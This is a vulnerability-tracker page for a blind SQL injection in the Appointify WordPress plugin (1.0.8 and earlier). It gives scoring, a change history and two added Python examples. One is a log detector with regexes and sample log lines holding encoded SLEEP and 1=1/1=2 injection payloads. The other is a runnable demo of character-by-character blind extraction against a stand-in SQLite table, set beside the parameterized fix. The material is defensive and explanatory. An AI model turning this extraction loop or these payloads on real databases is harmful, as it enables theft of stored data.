Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in appointify Appointify appointify allows Blind SQL Injection. This issue affects Appointify: from n/a through <= 1.0.8.
Published: 2025-12-30
Score: 7.6 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An improper neutralization of special elements in an SQL command (CWE-89) has been identified in the Appointify WordPress plugin. The flaw is a blind SQL injection: unsanitized input reaches a database query, and the attacker learns the result not from data echoed in the page but from differences in the response (content or timing), which is still enough to read arbitrary rows from the site's database one piece at a time. The published CVSS vector (C:H/I:N/A:L) rates the confidentiality impact as high, records no integrity impact, and a low availability impact.

Affected Systems

Affected users are WordPress site operators running the Appointify plugin at version 1.0.8 or earlier (the advisory gives the range as "from n/a through <= 1.0.8", i.e. with no lower bound, so every release up to and including 1.0.8 is in scope). The plugin is developed by appointify and deployed as a standard WordPress plugin; this page lists no fixed release.

Risk and Exploitability

The CVSS v3.1 base score is 7.6 (High). The vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L describes an attack over the network with low complexity and no user interaction, but with high privileges required (PR:H): as scored, the attacker already holds a privileged account on the site, so unauthenticated exploitation is not what the metric reflects (the advisory does not name the role). The EPSS score is below 1 %, the SSVC assessment in the record states Exploitation: none and Automatable: no, and the vulnerability is not listed in the CISA KEV catalog. Because the injection is blind, attempts do not surface as SQL error text in responses; they look like paired requests to the same endpoint that differ only by a true/false condition, or like requests carrying time-delay functions (SLEEP, BENCHMARK and similar) whose responses are markedly slower than the baseline for that endpoint. Monitoring web-server logs for both patterns would help detect attempts.

Generated by OpenCVE AI on April 29, 2026 at 22:03 UTC.
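The monitoring hint above (watch for time-based and boolean blind-injection probes) carried into working detection logic. This is an added example, not code from OpenCVE, Patchstack or the plugin vendor. It assumes a combined-format access log extended with a trailing response-time field in milliseconds (Apache's %D or %T would supply one); the endpoint, the action name, the parameter and the sample log lines are all constructed for illustration and are not the plugin's real routes.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample (combined log format plus a trailing response-time field in ms).
# The admin-ajax action and the "id" parameter are hypothetical, not the plugin's own.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Dec/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=appt_list&id=12 HTTP/1.1" 200 512 41
203.0.113.7 - - [30/Dec/2025:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=appt_list&id=12%27%20AND%201%3D1--%20- HTTP/1.1" 200 512 39
203.0.113.7 - - [30/Dec/2025:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=appt_list&id=12%27%20AND%201%3D2--%20- HTTP/1.1" 200 87 38
203.0.113.7 - - [30/Dec/2025:10:00:06 +0000] "GET /wp-admin/admin-ajax.php?action=appt_list&id=12%27%20AND%20SLEEP%285%29--%20- HTTP/1.1" 200 512 5043
198.51.100.2 - - [30/Dec/2025:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=appt_list&id=13 HTTP/1.1" 200 498 44
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)
# Time-based payloads: the attacker asks the database to stall so the answer leaks via latency.
TIME_BASED_RE = re.compile(r"(sleep\s*\(|benchmark\s*\(|pg_sleep|waitfor\s+delay)", re.I)
# Boolean probes: an injected comparison such as "AND 1=1" / "AND 1=2" toggles the result set.
BOOLEAN_PAIR_RE = re.compile(r"\b(and|or)\s+(\d+)\s*=\s*(\d+)", re.I)


def parse_line(line):
    """Split one access-log line into fields; the query string is percent-decoded
    so payloads hidden behind %27 / %20 encoding become visible to the regexes."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ms"] = int(rec["ms"])
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)
    return rec


def analyze(log_text, slow_factor=10):
    """Return (kind, client_ip, detail) findings for blind-SQLi indicators."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    # Baseline per path = fastest observed request. Adequate offline; a real
    # deployment would use a rolling percentile over a longer window.
    baseline = {}
    for r in records:
        baseline[r["path"]] = min(baseline.get(r["path"], r["ms"]), r["ms"])
    findings = []
    truth_values = defaultdict(set)  # (ip, path) -> truth values of injected comparisons
    for r in records:
        q = r["query"]
        if TIME_BASED_RE.search(q):
            findings.append(("time_based_payload", r["ip"], q))
            if r["ms"] >= slow_factor * baseline[r["path"]]:
                findings.append(("latency_spike", r["ip"],
                                 f"{r['ms']} ms vs baseline {baseline[r['path']]} ms"))
        for _, lhs, rhs in BOOLEAN_PAIR_RE.findall(q):
            truth_values[(r["ip"], r["path"])].add(int(lhs) == int(rhs))
    # One client sending both a true and a false comparison to the same endpoint is
    # the signature of boolean-based blind extraction.
    for (ip, path), seen in truth_values.items():
        if seen == {True, False}:
            findings.append(("boolean_pair_probe", ip, path))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in analyze(SAMPLE_LOG):
        print(f"{kind:20} {ip:15} {detail}")
```

Run against the constructed sample, only 203.0.113.7 is flagged: once for the SLEEP payload, once because that request took roughly 5 seconds against a 38 ms baseline, and once for the 1=1 / 1=2 pair; the benign request from 198.51.100.2 produces nothing. The baseline comparison matters because a SLEEP keyword alone can be a false positive (legitimate content can contain the word), whereas a keyword plus a latency spike on the same request is hard to explain innocently.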

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Appointify plugin as soon as a release newer than 1.0.8 is published; this page lists no fixed version yet, so until then treat every install at or below 1.0.8 as vulnerable
  • Use database accounts with the least privileges necessary for the plugin to function, so that a successful injection cannot read or alter tables the plugin never touches
  • If you maintain a fork or custom build of the plugin, route every user-controlled value into SQL through parameterized queries ($wpdb->prepare() in WordPress) and validate its type and range before it reaches the query

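How a blind SQL injection of the kind described in the Impact section actually leaks data, beside the parameterized form the recommended actions ask for. This is an added example, not code from the Appointify plugin or from OpenCVE: the table, its rows, the "count rows for a customer" lookup and all function names are hypothetical stand-ins, and the attacker's payload targets that stand-in schema. The database is an in-memory SQLite instance so the block runs offline.

```python
import sqlite3

# Constructed stand-in for a booking table (not the plugin's real schema): the
# column names, the test rows and the function names below are all hypothetical.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE appointments (id INTEGER PRIMARY KEY, customer TEXT, secret_note TEXT)"
    )
    conn.executemany(
        "INSERT INTO appointments (customer, secret_note) VALUES (?, ?)",
        [("alice", "token-9f3c"), ("bob", "token-ab77")],
    )
    return conn


def count_vulnerable(conn, customer):
    # CWE-89 pattern: the untrusted value is spliced into the SQL text, so a quote
    # inside it terminates the literal and the remainder is parsed as SQL.
    sql = "SELECT COUNT(*) FROM appointments WHERE customer = '" + customer + "'"
    return conn.execute(sql).fetchone()[0]


def count_safe(conn, customer):
    # Parameterized form: the driver sends the value separately from the query text,
    # so quotes and keywords inside it can never change the statement's structure.
    sql = "SELECT COUNT(*) FROM appointments WHERE customer = ?"
    return conn.execute(sql, (customer,)).fetchone()[0]


CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789-"


def blind_extract(oracle, known_customer="alice", max_len=16):
    """Boolean-based blind extraction.

    `oracle(value)` returns True when the query built from `value` matches a row.
    The application never returns secret_note; the attacker only observes
    "row found / not found", yet by appending a condition that compares one
    character of the secret at a time, the whole value is reconstructed.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = (
                f"{known_customer}' AND SUBSTR((SELECT secret_note FROM appointments "
                f"WHERE customer='{known_customer}'),{pos},1) = '{ch}"
            )
            if oracle(payload):
                recovered += ch
                break
        else:
            # No character matched: either the end of the secret was reached, or the
            # injection never fired (which is what the parameterized query produces).
            break
    return recovered


def demo():
    conn = make_db()
    leaked = blind_extract(lambda v: count_vulnerable(conn, v) == 1)
    blocked = blind_extract(lambda v: count_safe(conn, v) == 1)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print(f"vulnerable query leaked:     {leaked!r}")   # 'token-9f3c'
    print(f"parameterized query leaked: {blocked!r}")  # ''
```

Against the concatenating query the loop recovers the neighbouring row's secret_note in full with nothing but yes/no answers, which is why a "blind" finding still earns C:H in the vector above. Against the parameterized query the same payloads are just an odd-looking customer name that matches no row, so the extraction stops immediately with an empty result. Least-privilege database accounts (the second recommended action) limit what the subquery in the payload can reach; they do not remove the injection itself.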


Advisories

No advisories yet.

History

Thu, 23 Apr 2026 15:00:00 +0000

Metrics (cvssV3_1), values added: {'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Description, value removed: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through 1.0.8.
Description, value added: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in appointify Appointify appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through <= 1.0.8.
References: updated (no values shown)
Metrics (cvssV3_1), values added: {'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}


Tue, 20 Jan 2026 15:30:00 +0000


Tue, 20 Jan 2026 14:45:00 +0000


Mon, 05 Jan 2026 10:45:00 +0000

First Time appeared, values added: Wordpress; Wordpress wordpress
Vendors & Products, values added: Wordpress; Wordpress wordpress

Tue, 30 Dec 2025 18:15:00 +0000

Metrics (ssvc), values added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 30 Dec 2025 17:00:00 +0000

Description, value added: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through 1.0.8.
Title, value added: WordPress Appointify plugin <= 1.0.8 - SQL Injection vulnerability
Weaknesses, value added: CWE-89
References: added (no values shown)
Metrics (cvssV3_1), values added: {'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}


MITRE

Status: PUBLISHED

Assigner: Patchstack

Updated: 2026-04-28T16:13:51.380Z

Reserved: 2025-09-09T14:47:17.696Z

Link: CVE-2025-59129

Vulnrichment

Updated: 2025-12-30T17:58:46.900Z

NVD

Status: Deferred

Published: 2025-12-30T17:15:42.397

Modified: 2026-06-17T09:45:35.377

Link: CVE-2025-59129

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-29T22:15:16Z

Weaknesses
  • CWE-89

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')